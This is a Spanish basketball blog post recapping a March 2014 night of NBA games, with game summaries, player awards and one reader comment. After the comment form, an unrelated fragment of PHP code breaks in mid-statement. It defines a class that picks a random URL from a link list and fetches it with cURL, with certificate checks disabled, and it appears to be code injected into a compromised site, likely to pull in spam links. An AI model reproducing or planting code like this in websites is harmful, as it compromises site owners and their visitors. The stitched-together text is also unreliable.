La Crónica: Hogar dulce hogar

11 de March de 2014 por Simon

Eso debieron de pensar los Heat ayer después de volver a su pabellón tras perder tres partidos consecutivos a domicilio. El rival no era fácil, visitaban el American Airlines los Wizards que pasan por ser uno de los equipos más en forma de la liga, y por eso los Heat no quisieron dar demasiadas concesiones. A pesar de que los locales salieron fuertes, Washington resistió gracias a Gortat, Beal y a un sorprendente Drew Gooden. En el último cuarto, un parcial de 12-0 a favor de los actuales campeones eliminó toda esperanza de dar la campanada que pudieran tener los Wizards y la victoria se quedó finalmente en casa (90-99). Los Heat, igualados a derrotas con los Pacers,  están a sólo dos victorias del liderato de la conferencia mientras que los Wizards siguen peleando por la quinta plaza con los Brooklyn Nets que ayer jugaban también y conseguían una importante victoria ante un rival directo en la conferencia como son los Toronto Raptors. A pesar de sus problemas en el hombro, Paul Pierce finalmente pudo saltar a cancha desde el inicio y se convirtió en uno de los 5 hombres que consiguieron dobles dígitos de anotación. El gran inicio de los canadienses fue neutralizado enseguida por la segunda unidad de los Nets y tras el descanso, cuatro triples seguidos (dos de Deron y dos de JoJo) dispararon en el marcador a los locales hasta conseguir ventajas superiores  a los 10 puntos. Sin embargo, un gran esfuerzo de Lowry y DeRozan igualó el partido de nuevo pero una pérdida a falta de 28 segundos de terrence Ross desbarató los planes de remontada para los Raptors y dio la victoria a los Nets (97-101). 

Los Hawks rompieron por fin su racha de derrotas  en el segundo partido de Paul Millsap tras su reaparición. La mejora de los de Atlanta desde que volvió ha sido clarísima. En el pasado partido pusieron en aprietos a los Clippers y ayer vencieron  a los Jazz en su casa en un encuentro que dominaban claramente al descanso pero que se dejaron remontar en el tercer cuarto. En los últimos minutos, tres triples casi seguidos devolvieron la iniciativa en el marcador a los Hawks justo antes de iniciar el carrusel de tiros libres. Hasta 13 veces fueron a la línea los visitantes en los últimos 65 segundos. El acierto de Kyle Korver, Paul Millsap y Jeff Teague cerró el partido sin más sobresaltos (110-112). La octava plaza que ocupan ahora mismo los Hawks es el oscuro objeto de deseo de los New York Knicks que ayer dieron buena cuenta del peor equipo de la liga, Philadelphia, y se sitúan novenos. El inicio de partido de los de la Gran Manzana nos hacía presagiar el enésimo bochorno de la temporada pero poco a poco, los jugadores de New York fueron poniendo las cosas en su sitio y no tuvieron problemas para endosar a los Sixers su decimoséptima derrota consecutiva (110-123).

Los únicos gallos del Oeste que entraban en juego ayer eran los Clippers y los Suns. Un gran primer cuarto de los de Doc Rivers liderados por Blake Griffin provocó que los Suns siempre fueran a remolque con  desventajas de hasta 15 puntos pero si por algo se caracterizan los de Jeff Hornacek es por no rendirse jamás y gracias a una gran segunda parte llegaron a asustar algo a los locales. El oficio de Chris Paul y compañía cerró el partido antes de que los Suns pudieron apretar más el partido (105-112). En el tercer cuarto, un enganchón entre Griffin y Tucker por un rebote provocó una tangana en la que hasta el árbitro cayó al suelo. Cómo siempre que está metido en un enganchón de estos, Griffin salió de rositas mientras que Tucker fue expulsado.

En el resto de la jornada, los Bobcats vencieron a los Nuggets (98-105) con otro gran partido de Al Jefferson y los Bucks aprovecharon su condición de local para derrotar a los Magic gracias a un gran último cuarto (98-105).

PREMIOS

MVP: Los gritos de ¡MVP, MVP! empiezan a sonar en el Staples Center cuando juega Blake Griffin. Ayer anotó 29 puntos en la primera mitad y acabó con un total de 37 puntos y 6 rebotes. De todas maneras, aún está muy lejos del nivel de Durant y Lebron. La lucha será entre 2.

Rookie: Ya hacía tiempo que no asistíamos a uno de esos partidos tan completos de Michael Carter-Williams a los que no tenía más o menos acostumbrados a principio de temporada. 23 puntos, 13 reboes y 10 asistencias . En el mismo partido Tim Hardaway Jr. alcanzó los 28 puntos.

Sorpresa: Si Gary Neal empieza a rendir cerca del nivel que mostró anoche (19 puntos con 7 de 9, 4 rebotes y 4 asistencias), los Bobcats habrán ganado una amenaza ofensiva desde el banco y serán mucho más peligrosos todavía. Drew Gooden anotó 15 puntos en apenas 17 minutos. ¿Refuerzo de lujo para los Wizards?

Decepción: Trevor Ariza y John Wall naufragaron ante los Heat. El alero se quedó en 6 puntos tras fallar 9 de los 11 lanzamientos que intentó mientras que el base anotó sólo 7 puntos. Además, entre ambos perdieron 12 balones.

Esfuerzo en vano: Aparte del de Michael Carter-Williams que no evitó la 17ª derrota consecutiva de los Sixers, hay que destacar los 21 puntos, 8 rebotes, 7 asistencias y 2 robos de Kyle Lowry que tampoco fue capaz de ganar su partido.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. Ruxixon dice:
    #1

    Al margen de la pelea,los números de Blake Griffin son de reconocimiento total a su progreso.Echar un vistazo a su shot chart en alguna de las webs que lo tiene y divertios viendo como va aumentando su zona de influencia.

    Por ejemplo:
    http://www.basketball-reference.com/players/g/griffbl01/shooting/2014/

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>